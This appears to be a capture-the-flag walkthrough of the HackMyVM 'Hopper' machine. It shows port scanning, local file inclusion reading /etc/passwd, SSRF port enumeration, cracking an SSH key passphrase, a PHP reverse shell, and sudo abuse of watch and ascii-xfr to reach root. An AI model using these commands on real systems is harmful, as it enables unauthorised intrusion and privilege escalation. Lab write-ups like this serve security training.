https://hackmyvm.eu/machines/machine.php?vm=Hopper
Scan ports.
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
Nmap scan report for bogon (192.168.56.100)
Host is up (0.00079s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
| 256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
|_ 256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enum port 80.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
403,404,500 --wildcard -o 80.log
===============================================================
/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]
Check /advanced-search, input anything and click "Submit", notice the url became "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz if there is LFI.
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.
txt
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000005: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000001: 200 27 L 39 W 1439 Ch "/etc/passwd"
000000018: 200 12 L 88 W 664 Ch "/etc/fstab"
...
000000188: 200 0 L 1 W 32064 Ch "/var/log/faillog"
000000224: 200 1 L 4 W 1151 Ch "/var/run/utmp"
000000220: 200 34 L 237 W 164321 Ch "/var/log/wtmp"
000000199: 200 0 L 1 W 292584 Ch "/var/log/lastlog"
Get username through passwd.
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash
Make a python script to enum local port.
#!/usr/bin/python3
import requests
for port in range(1,65535):
res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
if len(res.text) == 0:
continue
else:
print(f'port {port} is open.')
Port 2222 is open.
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.
Check port 2222.
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'
<!DOCTYPE html>
<html>
<body>
<h1>[+] WARNING</h1>
<p> - Private corporative web server</p>
<p> - If you are non organization personal, leave immediately</p>
</body>
</html>
Fuzz dirs of port 2222.
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222' -t 50 -w /usr/share/dirbuster/wordlists/directory-lis
t-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181
==============================================================
/backup (Status: 200) [Size: 1751]
...
Get a id_rsa key at /backup. Chmod 600. Burteforce the key of id_rsa.
~ /usr/share/john/ssh2john.py id_rsa > hash.txt
& kali @ mykali in ~/Documents/hopper 0 [13:03:29]
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt ...
barcelona (id_rsa)
Login ssh with user name edward.
~ ssh edward@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/edward/.Xauthority does not exist
edward@hopper:~$ id
uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Upload a reverse shell php and get shell as www-data.
~ curl http://192.168.56.100/r.php
────────────────────────────────────────────────────────────────────────────────────────────────────────
& kali @ mykali in ~/Documents/hopper 0 [13:07:35]
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:35698.
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
07:07:50 up 1:41, 0 users, load average: 0.01, 0.02, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Check sudo -l.
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on hopper:
(henry) NOPASSWD: /usr/bin/watch
Set the term environment variable, and escalate to user henry.
www-data@hopper:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
$ id
id
uid=1001(henry) gid=1001(henry) groups=1001(henry)
Upload id_rsa.pub to /home/henry/.ssh/, change name to authorized_keys, and get ssh login as user henry.
~ ssh henry@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/henry/.Xauthority does not exist
henry@hopper:~$ id
uid=1001(henry) gid=1001(henry) grupos=1001(henry)
Check sudo -l.
henry@hopper:~$ sudo -l
Matching Defaults entries for henry on hopper:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User henry may run the following commands on hopper:
(root) NOPASSWD: /usr/bin/ascii-xfrUse ascii-xfr to create a authorzied_keys of root.
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"
0.6 Kbytes transferred at 565 CPS... Done.
Login as root.
~ ssh root@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /root/.Xauthority does not exist
root@hopper:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
hopper
